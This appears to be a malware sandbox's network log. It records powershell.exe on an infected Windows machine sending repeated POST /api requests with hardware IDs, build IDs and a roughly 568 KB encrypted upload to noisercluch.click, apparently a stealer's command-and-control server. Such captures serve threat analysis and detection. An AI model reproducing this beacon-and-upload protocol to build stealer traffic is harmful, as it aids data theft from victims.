                                                          Content-Length: 20377
                                                          Host: noisercluch.click
                                                          2025-01-01 16:11:19 UTC15331OUTData Raw: 2d 2d 44 32 54 4d 54 51 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 44 32 54 4d 54 51 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 32 54 4d 54 51 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 44 32 54 4d 54 51 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                          Data Ascii: --D2TMTQXTContent-Disposition: form-data; name="hwid"F9303BDA56946A72D9AC212D15D33917--D2TMTQXTContent-Disposition: form-data; name="pid"3--D2TMTQXTContent-Disposition: form-data; name="lid"WG6I6S--web44--D2TMTQXTContent-Disposit
                                                          2025-01-01 16:11:19 UTC5046OUTData Raw: 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00
                                                          Data Ascii: QMn 64F6(X&7~`aO@dR<x)
                                                          2025-01-01 16:11:19 UTC1137INHTTP/1.1 200 OK
                                                          Date: Wed, 01 Jan 2025 16:11:19 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=d7cphios24n69rj2cacpjv93bi; expires=Sun, 27 Apr 2025 09:57:58 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCu3ZF8m8TAZ77qzOcB46ZglWRxLQti6lMntum8LNz%2FsVj%2BFjuC%2FqKUp7VTv2KfSYcpgSGqBgC4%2FDsBoNo%2BBYlLKJQIsAAV4WJa0QuAkf8vyC4MlJCET9AOPUiUjKmFa87MQrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8fb3c8d58b0042a5-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1739&rtt_var=661&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21330&delivery_rate=1645070&cwnd=229&unsent_bytes=0&cid=6c0e97fcf7cf5138&ts=633&x=0"
                                                          2025-01-01 16:11:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2025-01-01 16:11:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.449888188.114.96.34431196C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-01 16:11:20 UTC276OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=1P92F68DOIFX
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 1191
                                                          Host: noisercluch.click
                                                          2025-01-01 16:11:20 UTC1191OUTData Raw: 2d 2d 31 50 39 32 46 36 38 44 4f 49 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 31 50 39 32 46 36 38 44 4f 49 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 50 39 32 46 36 38 44 4f 49 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 31 50 39 32 46 36 38 44 4f 49 46 58 0d 0a
                                                          Data Ascii: --1P92F68DOIFXContent-Disposition: form-data; name="hwid"F9303BDA56946A72D9AC212D15D33917--1P92F68DOIFXContent-Disposition: form-data; name="pid"1--1P92F68DOIFXContent-Disposition: form-data; name="lid"WG6I6S--web44--1P92F68DOIFX
                                                          2025-01-01 16:11:20 UTC1136INHTTP/1.1 200 OK
                                                          Date: Wed, 01 Jan 2025 16:11:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=57sn2e1k6614i5apj87jdpe88p; expires=Sun, 27 Apr 2025 09:57:59 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9I6Hfy0OUabS43gC%2BdB%2BjwhWsnVnp%2FXxx5kF9yxaE571sI6lD7UdYAcjCXNfd0lw9HgGeBN3edz43SFgD1KrSR90z%2BxvCMFCma8y%2BV5GEmX6%2BYB4dP4vTn6WrOWIHz9rhSlL5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8fb3c8dd59214356-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1733&rtt_var=672&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2103&delivery_rate=1602634&cwnd=237&unsent_bytes=0&cid=ca187ad984f8ccb3&ts=424&x=0"
                                                          2025-01-01 16:11:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2025-01-01 16:11:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.449899188.114.96.34431196C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-01 16:11:21 UTC274OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=Y28BDORX
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 568376
                                                          Host: noisercluch.click
                                                          2025-01-01 16:11:21 UTC15331OUTData Raw: 2d 2d 59 32 38 42 44 4f 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 59 32 38 42 44 4f 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 32 38 42 44 4f 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 59 32 38 42 44 4f 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                          Data Ascii: --Y28BDORXContent-Disposition: form-data; name="hwid"F9303BDA56946A72D9AC212D15D33917--Y28BDORXContent-Disposition: form-data; name="pid"1--Y28BDORXContent-Disposition: form-data; name="lid"WG6I6S--web44--Y28BDORXContent-Disposit
                                                          2025-01-01 16:11:21 UTC15331OUTData Raw: 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d 85 d2 b5 16 6a 06 95 e2 86 7e 23 94 8f 49 f2 39 93 f8 cc ec b4 d6 d5 15 c8 a9 1d 49 ab c2 6b 11 22 83 de ce 18 23 e6 27 2e de 19 f7 5c 51 63 9a 4c 35 b1
                                                          Data Ascii: <~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2|B|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]j~#I9Ik"#'.\QcL5
                                                          2025-01-01 16:11:21 UTC15331OUTData Raw: 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 32 bf 7e 23 5d 02 9a d0 ae 25 37 a8 d7 51 e2 57 91 de b7 12 82 89 97 94 9b e0 a5 12 98 77 56 3d 57 d4 7a f1 96 e9 f1 60 25 25 88 38 fb 9a 87 38 39 b3 3e
                                                          Data Ascii: 1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN|xM*%T<_/5IIELX;"&#ysH {x2~#]%7QWwV=Wz`%%889>
                                                          2025-01-01 16:11:21 UTC15331OUTData Raw: 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 03 fb 77 6f c4 fd 4e a8 21 f3 73 2e 11 0a 9a 96 b2 7d 39 1e 4e ba 58 c2 a6 80 52 43 3c 4e c8 ea ab 99 18 ea 1d 12 47 13 2c 5a e6 8b 34 06 15 81 a5 ae 25
                                                          Data Ascii: T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;woN!s.}9NXRC<NG,Z4%
                                                          2025-01-01 16:11:21 UTC15331OUTData Raw: 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa ea b7 65 14 eb 98 8b f7 ff 56 51 fc 7f 5f 10 9c 8d 84 47 02 b8 44 45 c6 36 04 1f 53 65 9c ed 0f 95 fd 8f 14 cd 53 01 d1 a1 e2 af bd e7 33 fe 89 f0 13 e1
                                                          Data Ascii: @h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>heVQ_GDE6SeS3
                                                          2025-01-01 16:11:21 UTC15331OUTData Raw: 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 3f 0a 7d 47 87 c2 7a 44 5b 0f a4 d7 87 51 a8 75 b8 4c db 1f 53 5a 6d 53 2c 1b de 3d b8 6e 2b 4a e8 a1 72 76 d6 83 28 7b 90 af c3 03 f3 f6 c4 0b 93 eb d3
                                                          Data Ascii: TH[.!%'@tA&<|<T|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$|wev^qPy{ohh"*s:%PbUpacFG)*,?}GzD[QuLSZmS,=n+Jrv({
                                                          2025-01-01 16:11:21 UTC15331OUTData Raw: ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 c2 0b 0d 5d be 7b f6 b3 2f 63 66 93 b7 96 a0 30 0a 97 41 fe 61 72 86 b3 fb 6e b0 75 73 42 6b 21 be ed e2 7e 14 6c 4b 04 f2 9b f6 f8 05 06 7e 25 96 2a 7d
                                                          Data Ascii: ! {2'=n}Q'\YE~0}:|O/.`(#~B|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t|CI]{/cf0AarnusBk!~lK~%*}
                                                          2025-01-01 16:11:21 UTC15331OUTData Raw: bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 4d ca 30 90 70 bd 01 d8 31 ee 4d fd 0e 90 27 1c 61 2f 0a a8 f9 72 ef 5a 57 95 bd 95 e3 75 5b b1 1b 2b 6b 57 f3 4f d7 2f ec 11 d8 8b 0c af 46 30 7e 4a 5e
                                                          Data Ascii: ].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?|.j@Tz8PhSIaW)]u^R<M0p1M'a/rZWu[+kWO/F0~J^
                                                          2025-01-01 16:11:21 UTC15331OUTData Raw: 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d 98 36 98 ac 3a ce d4 1f 5f 3f 13 15 1a 20 32 20 94 ac f4 63 e6 a4 89 69 4d a7 c1 4a d8 7f 9b 1a 9e 21 18 a7 09 ff c7 7d ce da 81 6e 3d 94 3c 11 e8 ae cf
                                                          Data Ascii: *}a*;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]6:_? 2 ciMJ!}n=<
                                                          2025-01-01 16:11:21 UTC15331OUTData Raw: 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 9b 45 f0 ae ae c8 c7 44 f6 c8 e7 85 35 b1 fc cb b3 4c 8d d1 80 bc 4e 35 e7 13 32 19 ec b5 fd 36 68 ce 85 2b 44 6f 6c d9 49 17 53 23 2a 41 01 62 4e ac 28
                                                          Data Ascii: gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6ED5LN526h+DolIS#*AbN(
                                                          2025-01-01 16:11:24 UTC1141INHTTP/1.1 200 OK
                                                          Date: Wed, 01 Jan 2025 16:11:24 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=238ilbh153k1o42a5rfll86o67; expires=Sun, 27 Apr 2025 09:58:02 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjasnrJLRRI%2BlX%2FbJbrySOYL57hs6PmCSElIuOS%2BiS%2B8QDukvvW2uJr8V9C2fxomkqrCoMOWBcJAAAfMPVAspzIGZtT7zL%2FIHDaxEisaCe2THt9oo2xzyM8x9lPbIBpls53CdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8fb3c8e57b08425c-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1609&rtt_var=618&sent=193&recv=582&lost=0&retrans=0&sent_bytes=2840&recv_bytes=570914&delivery_rate=1748502&cwnd=226&unsent_bytes=0&cid=fe4e6a973aea68b1&ts=2562&x=0"


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.449918188.114.96.34431196C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-01 16:11:24 UTC265OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 82
                                                          Host: noisercluch.click
                                                          2025-01-01 16:11:24 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 77 65 62 34 34 26 6a 3d 26 68 77 69 64 3d 46 39 33 30 33 42 44 41 35 36 39 34 36 41 37 32 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37
                                                          Data Ascii: act=get_message&ver=4.0&lid=WG6I6S--web44&j=&hwid=F9303BDA56946A72D9AC212D15D33917
                                                          2025-01-01 16:11:25 UTC1129INHTTP/1.1 200 OK
                                                          Date: Wed, 01 Jan 2025 16:11:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=pd0f63fhuvcjqu6vfhblm3buga; expires=Sun, 27 Apr 2025 09:58:04 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ucl5LptcdVuYeKKH3ITXB5oBLDABucNGkmeZ6R9%2BtIdjxymk%2F9JjqI2gZeWtxP7q%2FnQuensNVtunN6u2o6CXnzx81hMRgdgOoxVFMClX8wvelbr1KkPZlvICjD1Y5s3ZY2D1EQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8fb3c8f86e1343ab-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1564&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=983&delivery_rate=1813664&cwnd=221&unsent_bytes=0&cid=261027efabe315df&ts=455&x=0"
